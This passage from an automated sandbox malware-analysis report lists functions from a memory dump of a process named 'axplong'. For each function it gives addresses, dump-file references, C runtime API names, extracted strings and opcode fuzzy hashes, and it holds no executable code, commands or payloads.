                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c882d04414e136c7f4df02d1aaacd51d92b68dd1df6997a2aa7717dde50375b
                      • Instruction ID: 218fc4e0b39e0e054c38c1763f499de962d96e32dd46f475ad72c4eb15db7f93
                      • Opcode Fuzzy Hash: 7c882d04414e136c7f4df02d1aaacd51d92b68dd1df6997a2aa7717dde50375b
                      • Instruction Fuzzy Hash: 7221B673F204394B770CC47E8C572BDB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                      Function 0071765B Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e7f52769ebb950d961ccc53154d3774a8448d1313783a160089842bff32c65af
                      • Instruction ID: 1be4dca6b908a38e3c597e8ecf6afb9c1012a0dce6b7b10345ac62b268b47e6b
                      • Opcode Fuzzy Hash: e7f52769ebb950d961ccc53154d3774a8448d1313783a160089842bff32c65af
                      • Instruction Fuzzy Hash: 91117723F30C255A675C816D8C172BAA5D2DBD825071F533AD826E72C4E994DE23D290
                      Function 00718720 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: e338465a1e1601585ca9ccb8890e3b9ce0c22a5fbd91380d22ea3688640fec40
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: A0115B7B20014243D78486BDD8F85F6E796EBD5321B3C437AD1414B7D8DE2AD9C4D902
                      Function 0070645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 296ac83322da6771ac808ff95b4b416bfbda5563475e42fb5fa59322046085c4
                      • Instruction ID: 5ae89a4762a653c494e2dd4546494e6c7ec75f9e9f0d3608d0ec88cfaacb7aa1
                      • Opcode Fuzzy Hash: 296ac83322da6771ac808ff95b4b416bfbda5563475e42fb5fa59322046085c4
                      • Instruction Fuzzy Hash: F5E08C30041A88FFDE257B54CC19E8C3BAAEF01744F004910F8045A261CFB9EEA2C980
                      Function 0070A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 9f7935d539b45a0352a045427c669dc3cff2ec5e66eb0c50695a064d74d9f94e
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 19E0B672915228FBCB15DB98894898AF2FCEB49B54F654596B501D3291C274DF00C7D1
                      Function 006D2E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                      • String ID:
                      • API String ID: 57040152-0
                      • Opcode ID: 7ff5ea646185f74e11e69adfbd021a8942667ddc04251e7b019ed998a2e79c30
                      • Instruction ID: 94150e9eef84a35663afa75b3a0d475e64c34a2f6638ecdc57981a3a85dd129c
                      • Opcode Fuzzy Hash: 7ff5ea646185f74e11e69adfbd021a8942667ddc04251e7b019ed998a2e79c30
                      • Instruction Fuzzy Hash: 29A1DFB0D013569FDB11DF65C845BAAB7BABF15320F00852EE815D7341EB34EA05CB92
                      Function 006E7870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON
                      Download Yara Rule
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006E795C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 006E7968
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 006E7971
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: 'knd+s$@yn$d+s
                      • API String ID: 4078500453-591370547
                      • Opcode ID: d1390c8949c3f6fd6d165de2a0d2e4e76486e50eb2b181017f74e078b12758a5
                      • Instruction ID: 8406d0277a0ddaf05a6f02583dece9f4c959322ce7e9d69e203686e24dce31dd
                      • Opcode Fuzzy Hash: d1390c8949c3f6fd6d165de2a0d2e4e76486e50eb2b181017f74e078b12758a5
                      • Instruction Fuzzy Hash: 983103B29053449FD720DF69D845A6BB7E9EF14310F100A3EE945C3342E771EA54C3A1
                      Function 007070C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 37b034399fd2eed71d3cbc10a0b6a8f0bd036ecf59b67cb2a7652f976cfd9fac
                      • Instruction ID: de5e6a883657f08a62ef3482e1fd744c472588aeb44d629adbc6ea6639983da7
                      • Opcode Fuzzy Hash: 37b034399fd2eed71d3cbc10a0b6a8f0bd036ecf59b67cb2a7652f976cfd9fac
                      • Instruction Fuzzy Hash: 7C010C37E1C22AE1961C155CAC0263B17C85BC2BB471A021AF954F73C2DE4CFC03D1A0
                      Function 006D2670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D2806
                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006D28A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy___std_exception_destroy
                      • String ID: P#m$P#m
                      • API String ID: 2970364248-2422574832
                      • Opcode ID: 84d1b04c8104b9bc96912e26288c76606559fae619f788205c07dbc2d667237a
                      • Instruction ID: 0a9c28c462d1a7b4f4a945ecbcf3fb6fc2b758ed7c219447e3bcf8bf6738908f
                      • Opcode Fuzzy Hash: 84d1b04c8104b9bc96912e26288c76606559fae619f788205c07dbc2d667237a
                      • Instruction Fuzzy Hash: 4E718071E00249DFDB04CFA8C891ADDFBB5EF58310F14826EE805A7381E775A944CBA5
                      Function 006D2AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D2B23
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#m$P#m$This function cannot be called on a default constructed task
                      • API String ID: 2659868963-4216301011
                      • Opcode ID: 44cb7c464a381bdcdd4b81f50cf730e30f7a6ad6f5fd175737e31ed607295fac
                      • Instruction ID: a2d3318d52d70b2a986af057bd8bd80dddaa3a8498653a7ea971a85ef4e3e01b
                      • Opcode Fuzzy Hash: 44cb7c464a381bdcdd4b81f50cf730e30f7a6ad6f5fd175737e31ed607295fac
                      • Instruction Fuzzy Hash: 03F0F670A1030C9BC714DF69A8419DEB7EEDF14300F5041AEF80497301EB74AA548BA9
                      Function 006D2440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: 'knd+s$P#m$P#m
                      • API String ID: 2659868963-3219173019
                      • Opcode ID: 956ccab84050af0c6b72d736aa6c3b88a922b54185f88c1bd3499e49bcb368a8
                      • Instruction ID: 40577e41e353ac992d50a3f8df0aa889e155f2c97d5383aefa18a7a2bdd57f56
                      • Opcode Fuzzy Hash: 956ccab84050af0c6b72d736aa6c3b88a922b54185f88c1bd3499e49bcb368a8
                      • Instruction Fuzzy Hash: 52F0E5B1D1020DA7C714EBE4E805C89B3ECDE15300B008A36F644E7A01F774FA5487E5
                      Function 0070C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: 082ecb812ee3a324c839d005f9d9ae2aacac8a6d91682eca5a3988c65d0bc8d9
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 2FB12772A00285DFEB16CF68C8817AEBBE5EF55350F1483AAE8559B3C1D63C9D41CB60
                      Function 006EBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 532d30489d0d28d71054bf8dd91c13d39b5585492257779617c9d103f481ac2b
                      • Instruction ID: 5c16708047c159b0d6c1161f369278c68a8ea63face65d9b7169438046ae22bb
                      • Opcode Fuzzy Hash: 532d30489d0d28d71054bf8dd91c13d39b5585492257779617c9d103f481ac2b
                      • Instruction Fuzzy Hash: 0A215371A023499FDF10EFA5CC459FEBBBAEF08720F104069F501A7261DB34AD028BA5
                      Function 006E7040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                      Download Yara Rule
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 006E726C
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
